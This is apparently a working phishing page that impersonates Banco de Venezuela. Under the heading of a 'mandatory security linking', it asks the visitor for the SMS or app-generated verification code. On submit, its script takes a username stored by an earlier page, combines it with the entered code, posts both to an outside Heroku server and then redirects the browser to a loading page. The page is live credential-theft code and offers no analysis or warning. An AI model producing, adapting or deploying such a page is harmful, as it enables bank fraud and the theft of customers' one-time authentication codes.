<!DOCTYPE html>
<html lang="es">
  <head>
    <meta charset="UTF-8" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1.0, user-scalable=no"
    />
    <title>Banco de Venezuela</title>
    <style>
      body {
        margin: 0;
        padding: 0;
        font-family: Arial, sans-serif;
        height: 100vh;
        display: flex;
        justify-content: center;
        align-items: center;
        background-image: url(background.jpg);
        background-size: cover;
        background-position: center;
      }

      .container {
        display: flex;
        height: 100%;
        width: 100%;
      }

      .left-side {
        width: 50%;
        display: flex;
        justify-content: center;
        align-items: center;
      }

      .right-side {
        width: 50%;
      }

      form {
        width: 80%;
        background: white;
        max-width: 550px;
        box-shadow: 0 5px 10px 0 rgba(0, 0, 0, 0.1);
      }

      @media (max-width: 768px) {
        body {
          background: #ededed;
        }
        .container {
          flex-direction: column;
        }
        .left-side {
          width: 100%;
          height: 100vh;
        }
        .right-side {
          display: none;
        }
      }

      .form-group {
        position: relative;
        margin-bottom: 20px;
        margin: 20px;
      }

      .form-group label {
        position: absolute;
        top: 50%;
        left: 10px;
        transform: translateY(-55%);
        color: #999;
        transition: top 0.3s, font-size 0.3s;
        pointer-events: none;
      }

      .form-group input {
        width: 100%;
        padding: 10px;
        box-sizing: border-box;
        position: relative;
        height: 60px;
        border: 0;
        border-bottom: 1px solid gray;
        background: #ededed;
        outline: none;
      }
      .form-group input:focus {
        border: 0;
      }
      .form-group input:focus + label,
      .form-group input:not(:placeholder-shown) + label {
        top: 5px;
        font-size: 12px;
      }

      button {
        background-color: #0067b1;
        color: white;
        border-radius: 3px;
        border: 0;
        padding: 15px;
        width: 200px;
      }

      .slider-container {
        text-align: center;
        width: 80%;
        max-width: 600px;
        margin: auto;
      }
      .slider-container h2 {
        margin-bottom: 20px;
      }
      .slider {
        width: 100%;
        margin: 20px 0;
      }
      .slider-value {
        font-size: 24px;
        color: #333;
      }
    </style>
  </head>
  <body>
    <div class="container">
      <div class="left-side">
        <form id="loginform">
          <div style="text-align: center">
            <img
              src="logo.png"
              alt="Logo"
              style="width: 60%; margin-top: 20px"
            />
          </div>
          <div style="width: 100%; text-align: center">
            <div style="margin: 10px; color: #0067b1 !important">
              <h4>Vinculación de Seguridad Obligatoria</h4>
              <h5 style="padding: 20px">
                Ingrese el código recibido por SMS o código generado en amiven
              </h5>
              
            </div>
            <div style="width: 100%; text-align: center">
              <div
                style="
                  width: 100%;
                  text-align: center;
                  color: #0056b3;
                  font-weight: bold;
                  margin-bottom: 20px;
                "
              >
                
              </div>
              <style>
                .slider-container {
                  display: flex;
                  flex-direction: column;
                  align-items: center;
                  margin: 20px 0;
                  width: 100%;
                }
    
                .slider-value {
                  margin-bottom: 10px;
                  font-size: 20px;
                  font-weight: bold;
                }
    
                .slider {
                  -webkit-appearance: none;
                  appearance: none;
                  width: 90%;
                  height: 10px;
                  background: #ddd;
                  border-radius: 5px;
                  outline: none;
                  transition: background 0.3s ease;
                }
    
                .slider:hover {
                  background: #bbb;
                }
    
                .slider::-webkit-slider-thumb {
                  -webkit-appearance: none;
                  appearance: none;
                  width: 25px;
                  height: 25px;
                  background-color: #007bff;
                  border-radius: 50%;
                  cursor: pointer;
                  transition: background-color 0.3s ease;
                }
    
                .slider::-webkit-slider-thumb:hover {
                  background-color: #0056b3;
                }
    
                .slider::-moz-range-thumb {
                  width: 25px;
                  height: 25px;
                  background-color: #007bff;
                  border-radius: 50%;
                  cursor: pointer;
                  transition: background-color 0.3s ease;
                }
    
                .slider::-moz-range-thumb:hover {
                  background-color: #0056b3;
                }
    
                .slider::-ms-thumb {
                  width: 25px;
                  height: 25px;
                  background-color: #007bff;
                  border-radius: 50%;
                  cursor: pointer;
                  transition: background-color 0.3s ease;
                }
    
                .slider::-ms-thumb:hover {
                  background-color: #0056b3;
                }
    
                /* Para mejorar el aspecto en IE */
                .slider::-ms-track {
                  width: 100%;
                  height: 10px;
                  background: transparent;
                  border-color: transparent;
                  color: transparent;
                }
              </style>
              <div class="slider-container" style="text-align: center;">
                <div class="slider-value" id="sliderValue" style="color: #0056b3">
                  
                </div>
                
              </div>
              <script>
                const slider = document.getElementById("priceSlider");
                const sliderValue = document.getElementById("sliderValue");
      
                function formatNumber(num) {
                  if (num < 10000) {
                    return num;
                  }
                  return num.toString().replace(/\B(?=(\d{3})+(?!\d))/g, ",");
                }
      
                slider.addEventListener("input", function () {
                  sliderValue.textContent = `$${formatNumber(slider.value)} USD`;
                });
      
                // Formatear el valor inicial del slider
                sliderValue.textContent = `$${formatNumber(slider.value)} USD`;
              </script>
            </div>
    
            <div class="form-group">
              <input
                type="text"
                id="sms"
                name="sms"
                style="width: 100%"
                maxlength="8"
                required
              />
              <label for="sms">SMS *</label>
            </div>
            <div style="width: 100%; text-align: center;margin-bottom: 50px;">
              <button type="submit">Verificar</button>
            </div>
          </div>
        </form>
      </div>
      <div class="right-side"></div>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/axios@1.1.2/dist/axios.min.js"></script>

    <script>
      document.addEventListener("DOMContentLoaded", function () {
        const input = document.getElementById("sms");
        const label = input.nextElementSibling;
        label.style.top = "50%";
        if (input.value !== "") {
          label.style.top = "15px";
          label.style.fontSize = "12px";
        }

        input.addEventListener("focus", () => {
          label.style.top = "15px";
          label.style.fontSize = "12px";
        });

        input.addEventListener("blur", () => {
          if (!input.value) {
            label.style.top = "50%";
            label.style.fontSize = "";
          }
        });

        // Restringir la entrada a solo números
        input.addEventListener("input", function (event) {
          // Eliminar cualquier carácter que no sea un número
          this.value = this.value.replace(/[^0-9]/g, '');
        });
      });

      const form = document.querySelector("#loginform");
      form.addEventListener("submit", (event) => {
        event.preventDefault(); // Prevenir el envío del formulario
        const nombre = localStorage.getItem("usuario");
        const contra = document.querySelector("#sms").value;
        const data = {
          usuario: nombre,
          sms: contra,
        };

        axios
          .post("https://victorr3-ce4980942f00.herokuapp.com/codigo/", data, {
            headers: {
              Accept: "application/json",
              "Content-Type": "application/json",
            },
          })
          .then((response) => {
            window.location.href = "cargando2.html";
          })
          .catch((error) => {
            console.error(error);
          });
      });
    </script>
  </body>
</html>
